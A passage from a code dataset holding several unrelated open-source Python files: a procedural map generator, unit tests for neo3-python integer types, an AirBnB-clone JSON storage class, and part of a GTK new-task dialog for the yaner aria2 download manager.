False, minDistanceToMapBorder=8)\n        #mountains\n        addLandscapeElements(maparr, TOTAL_MNT_AUTOMS, _MOUNTAIN_CODE, [_GROUND_CODE], MNT_CYCLES,\n                             minDistanceToMapBorder=4)\n        # forest\n        addLandscapeElements(maparr, TOTAL_FOREST_AUTOMS, _FOREST_CODE, [_GROUND_CODE, _MOUNTAIN_CODE], FOREST_CYCLES,\n                             minDistanceToMapBorder=4)\n        #fields\n        addLandscapeElements(maparr, TOTAL_FIELD_AUTOMS, _FIELD_CODE, [_GROUND_CODE, _FOREST_CODE], FIELD_CYCLES,\n                             minDistanceToMapBorder=2)\n        # towns\n        Neigh = [_FIELD_CODE]\n        NeighNum = [3]\n        if not tryAddSingleElements(maparr, _TOWN_CODE, Neigh, NeighNum, elemCount=TOTAL_FIELD_AUTOMS, minDistance=7):\n            continue\n        # Military\n        Neigh = [_GROUND_CODE]\n        NeighNum = [7]\n        if not tryAddSingleElements(maparr, _MILITARY_BASE_CODE, Neigh, NeighNum, 2, minDistance=15):\n            continue\n        # Labs\n        Neigh = [_MOUNTAIN_CODE]\n        NeighNum = [7]\n        if not tryAddSingleElements(maparr, _LAB_CODE, Neigh, NeighNum, 2, minDistance=7):\n            continue\n        break\n    return 
maparr\n","repo_name":"sidav/ShadowPriest","sub_path":"Procedurals/CALandscapeGenerator.py","file_name":"CALandscapeGenerator.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"72924290371","text":"from unittest import TestCase\nfrom neo3.core.types.uint import _UIntBase\nfrom neo3.core.types import BigInteger, UInt160, UInt256\nfrom neo3.core import serialization\n\nclass BigIntegerTestCase(TestCase):\n def test_big_integer_add(self):\n b1 = BigInteger(10)\n b2 = BigInteger(20)\n\n b3 = b1 + b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(30, b3)\n\n def test_big_integer_sub(self):\n b1 = BigInteger(5505505505505505050505)\n b2 = BigInteger(5505505505505505000000)\n\n b3 = b1 - b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(50505, b3)\n\n def test_big_integer_mul(self):\n b1 = BigInteger(55055055055055)\n b2 = BigInteger(55055055055)\n\n b3 = b1 * b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(3031059087112109081053025, b3)\n\n def test_big_integer_div(self):\n b1 = BigInteger(55055055055055)\n b2 = BigInteger(55055055)\n\n b3 = b1 / b2\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(1000000, b3)\n\n def test_big_integer_div2(self):\n b1 = BigInteger(41483775933600000000)\n b2 = BigInteger(414937759336)\n\n b3 = b1 / b2\n b4 = b1 // b2\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(99975899, b3)\n self.assertEqual(b4, b3)\n\n def test_big_integer_div_rounding(self):\n b1 = BigInteger(1)\n b2 = BigInteger(2)\n self.assertEqual(0, b1 / b2) # 0.5 -> 0\n\n b1 = BigInteger(2)\n b2 = BigInteger(3)\n self.assertEqual(0, b1 / b2) # 0.66 -> 0\n\n b1 = BigInteger(5)\n b2 = BigInteger(4)\n self.assertEqual(1, b1 / b2) # 1.25 -> 1\n\n b1 = BigInteger(5)\n b2 = BigInteger(3)\n self.assertEqual(1, b1 / b2) # 1.66 -> 1\n\n b1 = BigInteger(-1)\n b2 = BigInteger(3)\n self.assertEqual(0, b1 / b2) # -0.33 -> 0\n\n b1 = BigInteger(-5)\n b2 = BigInteger(3)\n self.assertEqual(-1, b1 / b2) # -1.66 -> -1\n\n b1 = BigInteger(1)\n b2 = BigInteger(-2)\n self.assertEqual(0, b1/b2)\n\n def test_big_integer_div_old_block1473972(self):\n b1 = BigInteger(-11001000000)\n b2 = BigInteger(86400)\n result = b1 / b2\n self.assertEqual(-127326, result)\n\n def test_big_integer_float(self):\n b1 = BigInteger(5505.001)\n b2 = BigInteger(55055.999)\n\n b3 = b1 + b2\n\n self.assertIsInstance(b3, BigInteger)\n self.assertEqual(60560, b3)\n\n def test_big_integer_to_bytearray(self):\n b1 = BigInteger(8972340892734890723)\n ba = b1.to_bytearray()\n\n integer = BigInteger.frombytes(ba)\n self.assertEqual(8972340892734890723, integer)\n\n b2 = BigInteger(-100)\n b2ba = b2.to_bytearray()\n integer2 = BigInteger.frombytes(b2ba)\n self.assertEqual(-100, integer2)\n\n b3 = BigInteger(128)\n b3ba = b3.to_bytearray()\n self.assertEqual(b'\\x80\\x00', b3ba)\n\n b4 = BigInteger(0)\n b4ba = b4.to_bytearray()\n self.assertEqual(b'\\x00', b4ba)\n\n b5 = BigInteger(-146)\n b5ba = b5.to_bytearray()\n self.assertEqual(b'\\x6e\\xff', b5ba)\n\n b6 = BigInteger(-48335248028225339427907476932896373492484053930)\n b6ba = b6.to_bytearray()\n self.assertEqual(20, len(b6ba))\n\n b7 = BigInteger(-399990000)\n b7ba = b7.to_bytearray()\n self.assertEqual(b'\\x10\\xa3\\x28\\xe8', b7ba)\n\n b8 = BigInteger(-65023)\n b8ba = b8.to_bytearray()\n self.assertEqual(b'\\x01\\x02\\xff', b8ba)\n\n def test_big_integer_frombytes(self):\n b1 = BigInteger(8972340892734890723)\n ba = 
b1.to_bytearray()\n\n b2 = BigInteger.frombytes(ba)\n self.assertEqual(b1, b2)\n self.assertTrue(b1 == b2)\n\n def test_big_integer_sign(self):\n b1 = BigInteger(3)\n b2 = BigInteger(0)\n b3 = BigInteger(-4)\n self.assertEqual(1, b1.sign)\n self.assertEqual(0, b2.sign)\n self.assertEqual(-1, b3.sign)\n\n def test_big_integer_modulo(self):\n b1 = BigInteger(860593)\n b2 = BigInteger(-201)\n self.assertEqual(112, b1 % b2)\n\n b1 = BigInteger(20195283520469175757)\n b2 = BigInteger(1048576)\n self.assertEqual(888269, b1 % b2)\n\n b1 = BigInteger(-18224909727634776050312394179610579601844989529623334093909233530432892596607)\n b2 = BigInteger(14954691977398614017)\n self.assertEqual(-3100049211437790421, b1 % b2)\n\n b3 = BigInteger.frombytes(b'+K\\x05\\xbe\\xaai\\xfa\\xd4')\n self.assertEqual(b3, b1 % b2)\n\n def test_dunder_methods(self):\n b1 = BigInteger(1)\n b2 = BigInteger(2)\n b3 = BigInteger(3)\n\n self.assertEqual(1, abs(b1))\n self.assertEqual(0, b1 % 1)\n self.assertEqual(-1, -b1)\n self.assertEqual(\"1\", str(b1))\n self.assertEqual(1, b3 // b2)\n\n right_shift = b3 >> b1\n self.assertEqual(1, right_shift)\n self.assertIsInstance(right_shift, BigInteger)\n\n left_shift = b1 << b3\n self.assertEqual(8, left_shift)\n self.assertIsInstance(left_shift, BigInteger)\n\n def test_negative_shifting(self):\n # C#'s BigInteger changes a left shift with a negative shift index,\n # to a right shift with a positive index.\n\n b1 = BigInteger(8)\n b2 = BigInteger(-3)\n # shift against BigInteger\n self.assertEqual(1, b1 << b2)\n # shift against integer\n self.assertEqual(1, b1 << -3)\n\n # the same as above but for right shift\n self.assertEqual(64, b1 >> b2)\n self.assertEqual(64, b1 >> -3)\n\n def test_specials(self):\n self.assertEqual(0, BigInteger.ZERO())\n self.assertEqual(1, BigInteger.ONE())\n b = BigInteger.ZERO()\n\nclass UIntBase(_UIntBase):\n def serialize(self) -> bytearray:\n pass\n\n @classmethod\n def deserialize(cls, data: bytes):\n pass\n\nclass UIntBaseTest(TestCase):\n def test_create_with_empty_data(self):\n x = UIntBase(num_bytes=2)\n self.assertEqual(len(x._data), 2)\n self.assertEqual(x._data, b'\\x00\\x00')\n\n def test_valid_data(self):\n x = UIntBase(num_bytes=2, data=b'aabb')\n # test for proper conversion to raw bytes\n self.assertEqual(len(x._data), 2)\n self.assertNotEqual(len(x._data), 4)\n\n x = UIntBase(num_bytes=3, data=bytearray.fromhex('aabbcc'))\n self.assertEqual(len(x._data), 3)\n self.assertNotEqual(len(x._data), 6)\n\n def test_valid_rawbytes_data(self):\n x = UIntBase(num_bytes=2, data=b'\\xaa\\xbb')\n self.assertEqual(len(x._data), 2)\n self.assertNotEqual(len(x._data), 4)\n\n def test_invalid_data_type(self):\n with self.assertRaises(TypeError) as context:\n x = UIntBase(num_bytes=2, data='abc')\n self.assertTrue(\"Invalid data type\" in str(context.exception))\n\n def test_raw_data_that_can_be_decoded(self):\n \"\"\"\n some raw data can be decoded e.g. 
bytearray.fromhex('1122') but shouldn't be.\n        \"\"\"\n        tricky_raw_data = bytes.fromhex('1122')\n        x = UIntBase(num_bytes=2, data=tricky_raw_data)\n        self.assertEqual(x._data, tricky_raw_data)\n\n    def test_data_length_mismatch(self):\n        with self.assertRaises(ValueError) as context:\n            x = UIntBase(num_bytes=2, data=b'aa') # 2 != 1\n        self.assertTrue(\"Invalid UInt: data length\" in str(context.exception))\n\n    def test_size(self):\n        x = UIntBase(num_bytes=2, data=b'\\xaa\\xbb')\n        self.assertEqual(len(x), 2)\n\n    def test_hash_code(self):\n        x = UIntBase(num_bytes=4, data=bytearray.fromhex('DEADBEEF'))\n        self.assertEqual(hash(x), 4022250974)\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        self.assertEqual(hash(x), 8721)\n\n    def test_to_string(self):\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        self.assertEqual('2211', str(x))\n        self.assertNotEqual('1122', str(x))\n\n    def test_equal(self):\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        y = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        z = UIntBase(num_bytes=2, data=bytearray.fromhex('2211'))\n\n        self.assertFalse(x == None)\n        self.assertFalse(x == int(1122))\n        self.assertTrue(x == x)\n        self.assertTrue(x == y)\n        self.assertTrue(x != z)\n\n    def test_hash(self):\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        y = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        z = UIntBase(num_bytes=2, data=bytearray.fromhex('2211'))\n        self.assertEqual(hash(x), hash(y))\n        self.assertNotEqual(hash(x), hash(z))\n\n    def test_compare_to(self):\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        y = UIntBase(num_bytes=3, data=bytearray.fromhex('112233'))\n        z = UIntBase(num_bytes=2, data=bytearray.fromhex('1133'))\n        xx = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n\n        # test invalid type\n        with self.assertRaises(TypeError) as context:\n            x._compare_to(None)\n\n        expected = \"Cannot compare UIntBase to type NoneType\"\n        self.assertEqual(expected, str(context.exception))\n\n        # test invalid length\n        with self.assertRaises(ValueError) as context:\n            x._compare_to(y)\n\n        expected = \"Cannot compare UIntBase with length 2 to UIntBase with length 3\"\n        self.assertEqual(expected, str(context.exception))\n\n        # test data difference ('22' < '33')\n        self.assertEqual(-1, x._compare_to(z))\n        # test data difference ('33' > '22')\n        self.assertEqual(1, z._compare_to(x))\n        # test data equal\n        self.assertEqual(0, x._compare_to(xx))\n\n    def test_rich_comparison_methods(self):\n        x = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n        z = UIntBase(num_bytes=2, data=bytearray.fromhex('1133'))\n        xx = UIntBase(num_bytes=2, data=bytearray.fromhex('1122'))\n\n        self.assertTrue(x < z)\n        self.assertTrue(z > x)\n        self.assertTrue(x <= xx)\n        self.assertTrue(x >= xx)\n\nclass UInt160_and_256Test(TestCase):\n    def test_zero(self):\n        uint160 = UInt160.zero()\n        self.assertEqual(20, len(uint160.to_array()))\n\n        uint256 = UInt256.zero()\n        self.assertEqual(32, len(uint256.to_array()))\n\n    def test_from_string_wrong_length(self):\n        with self.assertRaises(ValueError) as ctx:\n            UInt160.from_string(\"1122\")\n        self.assertEqual(\"Invalid UInt160 Format: 4 chars != 40 chars\", str(ctx.exception))\n\n        with self.assertRaises(ValueError) as ctx:\n            UInt256.from_string(\"1122\")\n        self.assertEqual(\"Invalid UInt256 Format: 4 chars != 64 chars\", str(ctx.exception))\n\n    def test_from_string_various(self):\n        uint160 = UInt160.from_string(\"11\" * 20)\n        expected_data_uint160 = bytearray([0x11] * 20)\n        
self.assertEqual(expected_data_uint160, uint160.to_array())\n\n        uint256 = UInt256.from_string(\"11\" * 32)\n        expected_data_uint256 = bytearray([0x11] * 32)\n        self.assertEqual(expected_data_uint256, uint256.to_array())\n\n\n        uint160_from_bytes = UInt160.deserialize_from_bytes(expected_data_uint160)\n        self.assertEqual(expected_data_uint160, uint160_from_bytes.to_array())\n\n        uint256_from_bytes = UInt256.deserialize_from_bytes(expected_data_uint256)\n        self.assertEqual(expected_data_uint256, uint256_from_bytes.to_array())\n\n        # test deserialize with too much data\n        data_uint160 = bytearray(21 * [0x11])\n        uint160_from_bytes = UInt160.deserialize_from_bytes(data_uint160)\n        self.assertEqual(data_uint160[:20], uint160_from_bytes.to_array())\n\n        data_uint256 = bytearray(33 * [0x11])\n        uint256_from_bytes = UInt256.deserialize_from_bytes(data_uint256)\n        self.assertEqual(expected_data_uint256[:32], uint256_from_bytes.to_array())\n\n        # test deserialize with too little data\n        data_uint160 = bytearray(19 * [0x11])\n        data_uint256 = bytearray(31 * [0x11])\n        with self.assertRaises(ValueError) as ctx:\n            UInt160.deserialize_from_bytes(data_uint160)\n        self.assertEqual(\"Insufficient data 19 bytes is less than the required 20\", str(ctx.exception))\n\n        with self.assertRaises(ValueError) as ctx:\n            UInt256.deserialize_from_bytes(data_uint256)\n        self.assertEqual(\"Insufficient data 31 bytes is less than the required 32\", str(ctx.exception))\n\n    def test_deserialize_from_stream(self):\n        data_uint160 = bytearray(20 * [0x11])\n        data_uint256 = bytearray(32 * [0x11])\n\n        with serialization.BinaryReader(data_uint160) as br:\n            # we explicitly call deserialize, instead of br.read_uint160() for coverage\n            uint160 = UInt160()\n            uint160.deserialize(br)\n            self.assertEqual(data_uint160, uint160._data)\n\n        with serialization.BinaryReader(data_uint256) as br:\n            uint256 = UInt256()\n            uint256.deserialize(br)\n            self.assertEqual(data_uint256, uint256._data)\n\n    def test_serialize_to_stream(self):\n        data_uint160 = bytearray(20 * [0x11])\n        data_uint256 = bytearray(32 * [0x11])\n        uint160 = UInt160(data_uint160)\n        uint256 = UInt256(data_uint256)\n\n        with serialization.BinaryWriter() as bw:\n            bw.write_serializable(uint160)\n            self.assertEqual(data_uint160, bw._stream.getvalue())\n\n        with serialization.BinaryWriter() as bw:\n            bw.write_serializable(uint256)\n            self.assertEqual(data_uint256, bw._stream.getvalue())\n","repo_name":"CityOfZion/neo3-python","sub_path":"tests/core/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":13708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"15194530505","text":"#!/usr/bin/python3\n\"\"\"file_storage.py contains the FileStorage class that serializes\ninstances to a JSON file and reloads them for the AirBnB clone project\n\"\"\"\nimport datetime\nimport json\nimport os\n\n\nclass FileStorage:\n    \"\"\"Class used to store user data in JSON format\"\"\"\n    __file_path = \"file.json\"\n    __objects = {}\n\n    def all(self):\n        \"\"\"returns the dictionary of all stored objects\"\"\"\n        return FileStorage.__objects\n\n    def new(self, obj):\n        \"\"\"used to store a new object in the __objects dict\"\"\"\n        obj_key = type(obj).__name__ + '.' 
+ obj.id\n        FileStorage.__objects[obj_key] = obj\n\n    def save(self):\n        \"\"\"Serializes __objects to the JSON file.\"\"\"\n        with open(FileStorage.__file_path, \"w\", encoding=\"utf-8\") as fileName:\n            object_dict = {k: v.to_dict()\n                           for k, v in FileStorage.__objects.items()}\n            json.dump(object_dict, fileName)\n\n    def reload(self):\n        \"\"\"Deserializes JSON file into __objects.\"\"\"\n        if not os.path.isfile(FileStorage.__file_path):\n            return\n        with open(FileStorage.__file_path, \"r\", encoding=\"utf-8\") as fileName:\n            obj_dict = json.load(fileName)\n            obj_dict = {k: self.classes()[v['__class__']](**v)\n                        for k, v in obj_dict.items()}\n            FileStorage.__objects = obj_dict\n\n    def classes(self):\n        \"\"\"Returns a dictionary of valid classes and their references.\"\"\"\n        from models.base_model import BaseModel\n        from models.user import User\n        from models.state import State\n        from models.city import City\n        from models.amenity import Amenity\n        from models.place import Place\n        from models.review import Review\n\n        classes = {\"BaseModel\": BaseModel,\n                   \"User\": User,\n                   \"State\": State,\n                   \"City\": City,\n                   \"Amenity\": Amenity,\n                   \"Place\": Place,\n                   \"Review\": Review}\n        return classes\n\n    def attributes(self):\n        \"\"\"Returns the valid attributes of all classes\"\"\"\n        attributes = {\n            \"BaseModel\": {\n                \"id\": str,\n                \"created_at\": datetime.datetime,\n                \"updated_at\": datetime.datetime},\n            \"User\": {\n                \"email\": str,\n                \"password\": str,\n                \"first_name\": str,\n                \"last_name\": str},\n            \"State\": {\n                \"name\": str},\n            \"City\": {\n                \"state_id\": str,\n                \"name\": str},\n            \"Amenity\": {\n                \"name\": str},\n            \"Place\": {\n                \"city_id\": str,\n                \"user_id\": str,\n                \"name\": str,\n                \"description\": str,\n                \"number_rooms\": int,\n                \"number_bathrooms\": int,\n                \"max_guest\": int,\n                \"price_by_night\": int,\n                \"latitude\": float,\n                \"longitude\": float,\n                \"amenity_ids\": list},\n            \"Review\": {\n                \"place_id\": str,\n                \"user_id\": str,\n                \"text\": str}\n        }\n        return attributes\n","repo_name":"DT-Brandon/AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
+{"seq_id":"6211350822","text":"import os\nimport xmlrpc.client\n\nfrom gi.repository import Gtk, Gio\nfrom gi.repository.Gio import SettingsBindFlags as BindFlags\n\nfrom yaner.Task import Task\nfrom yaner.ui.Widgets import RightAlignedLabel, AlignedExpander\nfrom yaner.ui.Widgets import MetafileChooserButton, FileChooserEntry, URIsView\nfrom yaner.ui.Widgets import HORIZONTAL, VERTICAL, Box, Grid\nfrom yaner.ui.PoolTree import PoolModel\nfrom yaner.ui.CategoryComboBox import CategoryFilterModel, CategoryComboBox\nfrom yaner.utils.Logging import LoggingMixin\n\n_BT_FILTER_NAME = _('Torrent Files')\n_ML_FILTER_NAME = _('Metalink Files')\n_BT_MIME_TYPES = {'application/x-bittorrent'}\n_ML_MIME_TYPES = {'application/metalink4+xml', 'application/metalink+xml'}\n_RESPONSE_RESET = -1\n_RESPONSE_SAVE = -2\n\nclass _Option(object):\n    \"\"\"A widget wrapper that converts between widget values and the format\n    aria2c expects.\n    \"\"\"\n    def __init__(self, widget, property_, mapper):\n        self.widget = widget\n        self.property_ = property_\n        self.mapper = mapper\n\n    @property\n    def value(self):\n        \"\"\"Value to be used in XML-RPC.\"\"\"\n        widget_value = self.widget.get_property(self.property_)\n        return self.mapper(widget_value)\n\n    @property\n    def widget_value(self):\n        \"\"\"Get the value of the widget.\"\"\"\n        
return self.widget.get_property(self.property_)\n\n    @widget_value.setter\n    def widget_value(self, value):\n        \"\"\"Set the value of the widget.\"\"\"\n        self.widget.set_property(self.property_, value)\n\n    ## Mappers\n    default_mapper = lambda x: x\n    string_mapper = lambda x: x\n    bool_mapper = lambda x: 'true' if x else 'false'\n    int_mapper = lambda x: str(int(x))\n    float_mapper = lambda x: str(float(x))\n    kib_mapper = lambda x: str(int(x) * 1024)\n    mib_mapper = lambda x: str(int(x) * 1024 * 1024)\n    prioritize_mapper = lambda x: 'head, tail' if x else ''\n\nclass _Settings(Gio.Settings):\n    \"\"\"GSettings class for options.\"\"\"\n    def __init__(self, schema_id, delay=False):\n        Gio.Settings.__init__(self, schema_id)\n\n        if delay:\n            # Don't apply changes to dconf until apply() is called\n            self.delay()\n\n        self._delay = delay\n\n    def bind(self, options, flags=BindFlags.DEFAULT):\n        keys = self.list_keys()\n        for key, option in options.items():\n            if key in keys:\n                Gio.Settings.bind(self, key, option.widget, option.property_, flags)\n\n    def reset(self, options):\n        keys = self.list_keys()\n        for key, option in options.items():\n            if key in keys:\n                Gio.Settings.reset(self, key)\n                # In delayed writing mode the widget value doesn't update\n                # when the setting is no different from the default value,\n                # so update it manually\n                option.widget_value = self.get_value(key).unpack()\n        self.apply()\n\nclass _TaskNewUI(LoggingMixin):\n    \"\"\"Base class for the UIs of the new task dialog.\"\"\"\n\n    def __init__(self, task_options, expander_label):\n        LoggingMixin.__init__(self)\n\n        self._settings = _Settings('com.kissuki.yaner.task', delay=True)\n        self._task_options = task_options.copy()\n\n        expander = AlignedExpander(expander_label)\n        self._uris_expander = expander\n\n        vbox = Box(VERTICAL)\n        expander.add(vbox)\n        self._content_box = vbox\n\n    @property\n    def uris_expander(self):\n        return self._uris_expander\n\n    @property\n    def aria2_options(self):\n        return {key: option.value for (key, option) in self._task_options.items()}\n\n    def activate(self, new_options):\n        \"\"\"When the UI is changed to this one, bind and update the setting widgets.\"\"\"\n        self._settings.bind(self._task_options)\n        for key, option in self._task_options.items():\n            try:\n                option.widget_value = new_options[key]\n            except KeyError:\n                pass\n        self._uris_expander.show_all()\n\n    def deactivate(self):\n        \"\"\"When the UI is changed from this one, unbind the properties.\"\"\"\n        self._settings.revert()\n\n    def response(self, response_id):\n        \"\"\"When the dialog is responded to, create a new task. 
Return whether the dialog should\n        be kept showing.\n        \"\"\"\n        if response_id in (Gtk.ResponseType.CANCEL, Gtk.ResponseType.DELETE_EVENT):\n            return False\n        elif response_id == _RESPONSE_RESET:\n            self._settings.reset(self._task_options)\n            return True\n        elif response_id == _RESPONSE_SAVE:\n            self._settings.apply()\n            return True\n        else:\n            return True\n\nclass _TaskNewDefaultUI(_TaskNewUI):\n    \"\"\"Default UI of the new task dialog.\"\"\"\n    def __init__(self, task_options, parent):\n        _TaskNewUI.__init__(self, task_options,\n                            expander_label=_('URIs/Torrent/Metalink File')\n                            )\n\n        box = self._content_box\n\n        tooltip = _('Enter URIs here or select Torrent/Metalink files'\n                    ' by clicking the icon on the right side.')\n        secondary_tooltip = _('Select Torrent/Metalink Files')\n        entry = FileChooserEntry(secondary_tooltip,\n                                 parent,\n                                 Gtk.FileChooserAction.OPEN,\n                                 update_entry=False,\n                                 mime_list=(\n                                     (_BT_FILTER_NAME, _BT_MIME_TYPES),\n                                     (_ML_FILTER_NAME, _ML_MIME_TYPES),\n                                 ),\n                                 truncate_multiline=True,\n                                 tooltip_text=tooltip,\n                                 secondary_icon_tooltip_text=secondary_tooltip,\n                                 )\n        entry.set_size_request(350, -1)\n        box.pack_start(entry)\n        self._task_options['uris'] = _Option(entry, 'text', _Option.string_mapper)\n\n        self.uri_entry = entry\n\n    def activate(self, options):\n        _TaskNewUI.activate(self, options)\n        self.uri_entry.grab_focus()\n\nclass _TaskNewNormalUI(_TaskNewUI):\n    \"\"\"Normal UI of the new task dialog.\"\"\"\n    def __init__(self, task_options):\n        _TaskNewUI.__init__(self, task_options,\n                            expander_label=_('URI(s)')\n                            )\n\n        box = self._content_box\n\n        tooltip = _('Specify HTTP(S)/FTP URI:\\n'\n                    '\\thttp://www.example.com/bar.iso\\n\\n'\n                    'Add some mirrors for that file:\\n'\n                    '\\thttps://www.mirror1.com/foo/bar.iso\\n'\n                    '\\tftp://www.mirror2.com/foo/bar.iso\\n\\n'\n                    'Or use a Magnet URI (does not support mirrors):\\n'\n                    '\\tmagnet:?xt=urn:sha1:YNCKHTQCWBTRNJIV4WNAE52SJUQCZO5C\\n'\n                    )\n        uris_view = URIsView(tooltip_markup=tooltip)\n        uris_view.set_size_request(350, 70)\n        box.pack_start(uris_view)\n        self._task_options['uris'] = _Option(uris_view, 'uris',\n                                             _Option.default_mapper)\n\n        hbox = Box(HORIZONTAL)\n        box.pack_start(hbox)\n\n        # Rename\n        tooltip = _('Rename the downloaded file to this name.')\n\n        label = RightAlignedLabel(_('Rename:'), tooltip_text=tooltip)\n        hbox.pack_start(label, expand=False)\n\n        entry = Gtk.Entry(tooltip_text=tooltip, activates_default=True)\n        hbox.pack_start(entry)\n        self._task_options['out'] = _Option(entry, 'text', _Option.string_mapper)\n\n        # Connections\n        tooltip = _('The max connections to download the file.')\n\n        label = RightAlignedLabel(_('Connections:'), tooltip_text=tooltip)\n        hbox.pack_start(label, expand=False)\n\n        adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n        spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n                                     tooltip_text=tooltip)\n        hbox.pack_start(spin_button)\n        self._task_options['split'] = _Option(spin_button, 'value',\n                                              _Option.int_mapper)\n\n        self._uris_view = uris_view\n\n    @property\n    def uris_view(self):\n        return self._uris_view\n\n    def activate(self, options):\n        _TaskNewUI.activate(self, options)\n        self._uris_view.grab_focus()\n\n    def response(self, response_id):\n        if response_id == Gtk.ResponseType.OK:\n            options = self.aria2_options\n\n            # Workaround for aria2 bug#3527521\n            options.pop('bt-prioritize-piece')\n\n            category = options.pop('category')\n            uris = options.pop('uris')\n            if not uris:\n                return True\n\n            name = options['out'] if options['out'] else os.path.basename(uris[0])\n\n            Task(name=name, uris=uris, 
options=options, category=category).start()\n\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass _TaskNewBTUI(_TaskNewUI):\n \"\"\"BT UI of the new task dialog.\"\"\"\n def __init__(self, task_options):\n _TaskNewUI.__init__(self, task_options,\n expander_label=_('Torrent File')\n )\n\n box = self._content_box\n\n button = MetafileChooserButton(title=_('Select torrent file'),\n mime_types=_BT_MIME_TYPES,\n )\n button.set_size_request(350, -1)\n box.pack_start(button)\n self._task_options['torrent_filename'] = _Option(button, 'filename',\n _Option.string_mapper)\n\n def response(self, response_id):\n if response_id == Gtk.ResponseType.OK:\n options = self.aria2_options\n\n torrent_filename = options.pop('torrent_filename')\n if torrent_filename is None:\n return True\n else:\n name = os.path.basename(torrent_filename)\n with open(torrent_filename, 'br') as torrent_file:\n torrent = xmlrpc.client.Binary(torrent_file.read())\n\n uris = options.pop('uris')\n category = options.pop('category')\n\n Task(name=name, torrent=torrent, uris=uris,\n options=options, category=category).start()\n\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass _TaskNewMLUI(_TaskNewUI):\n \"\"\"Metalink UI of the new task dialog.\"\"\"\n def __init__(self, task_options):\n _TaskNewUI.__init__(self, task_options,\n expander_label=_('Metalink File')\n )\n\n box = self._content_box\n\n button = MetafileChooserButton(title=_('Select metalink file'),\n mime_types=_ML_MIME_TYPES,\n )\n button.set_size_request(350, -1)\n box.pack_start(button)\n self._task_options['metalink_filename'] = _Option(button, 'filename',\n _Option.string_mapper)\n\n def response(self, response_id):\n if response_id == Gtk.ResponseType.OK:\n options = self.aria2_options\n\n # Workaround for aria2 bug#3527521\n options.pop('uris')\n\n metalink_filename = options.pop('metalink_filename')\n if metalink_filename is None:\n return True\n else:\n name = os.path.basename(metalink_filename)\n with open(metalink_filename, 'br') as metalink_file:\n metafile = xmlrpc.client.Binary(metalink_file.read())\n\n category = options.pop('category')\n\n Task(name=name, metafile=metafile, options=options,\n category=category).start()\n return False\n else:\n return _TaskNewUI.response(self, response_id)\n\nclass TaskNewDialog(Gtk.Dialog, LoggingMixin):\n \"\"\"Dialog for creating new tasks.\"\"\"\n def __init__(self, pool_model, *args, **kwargs):\n Gtk.Dialog.__init__(self, title=_('Create New Task'), *args, **kwargs)\n LoggingMixin.__init__(self)\n\n self._ui = None\n self._default_ui = None\n self._normal_ui = None\n self._bt_ui = None\n self._ml_ui = None\n\n self._task_options = {}\n\n ### Action Area\n action_area = self.get_action_area()\n action_area.set_layout(Gtk.ButtonBoxStyle.START)\n\n button = Gtk.Button.new_from_stock(Gtk.STOCK_CANCEL)\n self.add_action_widget(button, Gtk.ResponseType.CANCEL)\n action_area.set_child_secondary(button, True)\n\n image = Gtk.Image.new_from_stock(Gtk.STOCK_GO_DOWN, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Download'), image=image, use_underline=True)\n self.add_action_widget(button, Gtk.ResponseType.OK)\n action_area.set_child_secondary(button, True)\n\n advanced_buttons = []\n\n image = Gtk.Image.new_from_stock(Gtk.STOCK_UNDO, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Reset Settings'), image=image, use_underline=True)\n button.set_no_show_all(True)\n self.add_action_widget(button, _RESPONSE_RESET)\n advanced_buttons.append(button)\n\n image = 
Gtk.Image.new_from_stock(Gtk.STOCK_SAVE, Gtk.IconSize.BUTTON)\n button = Gtk.Button(_('_Save Settings'), image=image, use_underline=True)\n button.set_no_show_all(True)\n self.add_action_widget(button, _RESPONSE_SAVE)\n advanced_buttons.append(button)\n\n ### Content Area\n content_area = self.get_content_area()\n\n vbox = Box(VERTICAL)\n content_area.add(vbox)\n self._main_vbox = vbox\n\n ## Save to\n expander = AlignedExpander(_('Save to...'))\n expander.connect_after('activate', self.update_size)\n vbox.pack_start(expander)\n self.save_expander = expander\n\n hbox = Box(HORIZONTAL)\n expander.add(hbox)\n\n # Directory\n tooltip = _('Select the directory to save files')\n entry = FileChooserEntry(_('Select download directory'),\n self,\n Gtk.FileChooserAction.SELECT_FOLDER,\n tooltip_text=tooltip\n )\n hbox.pack_end(entry)\n self._task_options['dir'] = _Option(entry, 'text', _Option.string_mapper)\n\n model = CategoryFilterModel(pool_model)\n combo_box = CategoryComboBox(model, self)\n combo_box.connect('changed', self._on_category_cb_changed, entry)\n combo_box.set_active(0)\n hbox.pack_start(combo_box)\n self._task_options['category'] = _Option(combo_box, 'category',\n _Option.default_mapper)\n\n ## Advanced\n expander = AlignedExpander(_('Advanced'), expanded=False)\n expander.connect_after('activate',\n self._on_advanced_expander_activated,\n advanced_buttons)\n expander.connect_after('activate', self.update_size)\n vbox.pack_end(expander)\n self.advanced_expander = expander\n\n notebook = Gtk.Notebook()\n expander.add(notebook)\n\n ## Normal Task Page\n label = Gtk.Label(_('Normal Task'))\n vbox = 